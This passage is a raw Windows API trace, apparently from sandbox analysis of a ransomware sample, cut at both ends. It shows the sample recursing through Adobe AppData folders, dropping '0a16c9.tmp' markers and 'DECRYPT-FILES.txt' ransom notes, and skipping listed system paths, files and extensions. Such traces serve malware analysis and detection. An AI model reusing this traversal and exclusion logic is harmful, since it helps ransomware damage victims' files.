(lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.085] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.085] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.085] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="AhnLab") returned 0x0 [0180.085] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.085] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\") returned 63 [0180.085] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.085] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\\\0a16c9.tmp") returned 74 [0180.085] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\headlights\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.086] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\") returned 63 [0180.086] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.086] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\\\DECRYPT-FILES.txt") returned 81 [0180.086] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\headlights\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.086] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\") returned 63 [0180.086] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\*" [0180.086] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee76ed40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee76ed40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.086] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.086] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee76ed40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee76ed40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.086] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.086] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.086] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee76ed40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee76ed40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee76ed40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.086] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.086] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.086] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.086] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.086] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.086] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.087] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.087] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.087] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.087] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.087] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.087] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.087] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.087] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.087] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.087] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\") returned 63 [0180.087] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.087] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\" [0180.087] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\0a16c9.tmp" [0180.087] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.087] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\headlights\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.087] CloseHandle (hObject=0x0) returned 0 [0180.087] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.087] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0c6680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.088] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.088] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0c6680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.088] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.088] CloseHandle (hObject=0x26c) returned 1 [0180.088] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0180.088] lstrcmpW (lpString1="Linguistics", lpString2=".") returned 1 [0180.088] lstrcmpW (lpString1="Linguistics", lpString2="..") returned 1 [0180.088] lstrcatW (in: lpString1="Linguistics", lpString2="\\" | out: lpString1="Linguistics\\") returned="Linguistics\\" [0180.088] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Linguistics\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\" [0180.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\Program Files") returned 0x0 [0180.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch=":\\Windows") returned 0x0 [0180.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\Games\\") returned 0x0 [0180.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\All Users") returned 0x0 [0180.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="AhnLab") returned 0x0 [0180.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.088] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\") returned 64 [0180.088] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.088] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\\\0a16c9.tmp") returned 75 [0180.089] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.119] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\") returned 64 [0180.119] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.119] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\\\DECRYPT-FILES.txt") returned 82 [0180.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.119] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\") returned 64 [0180.119] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*" [0180.119] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee7bb000, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee7bb000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.120] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.120] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee7bb000, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee7bb000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.120] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.120] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.120] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee7bb000, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee7bb000, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee7bb000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.120] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.120] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.120] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.120] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.120] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.120] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.120] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.120] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.120] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.120] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.120] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.120] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.120] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.120] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.120] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.120] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\") returned 64 [0180.120] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.120] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\" [0180.120] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\0a16c9.tmp" [0180.120] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.121] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.121] CloseHandle (hObject=0x0) returned 0 [0180.121] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.121] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0ec7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.121] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.121] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 1 [0180.121] lstrcmpW (lpString1="Dictionaries", lpString2=".") returned 1 [0180.121] lstrcmpW (lpString1="Dictionaries", lpString2="..") returned 1 [0180.121] lstrcatW (in: lpString1="Dictionaries", lpString2="\\" | out: lpString1="Dictionaries\\") returned="Dictionaries\\" [0180.121] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2="Dictionaries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\" [0180.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\Program Files") returned 0x0 [0180.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch=":\\Windows") returned 0x0 [0180.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\Games\\") returned 0x0 [0180.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\All Users") returned 0x0 [0180.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="AhnLab") returned 0x0 [0180.121] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.121] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\") returned 77 [0180.122] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.122] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\\\0a16c9.tmp") returned 88 [0180.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\dictionaries\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.122] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\") returned 77 [0180.122] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.122] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\\\DECRYPT-FILES.txt") returned 95 [0180.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\dictionaries\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.124] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\") returned 77 [0180.124] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*" [0180.124] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee7bb000, 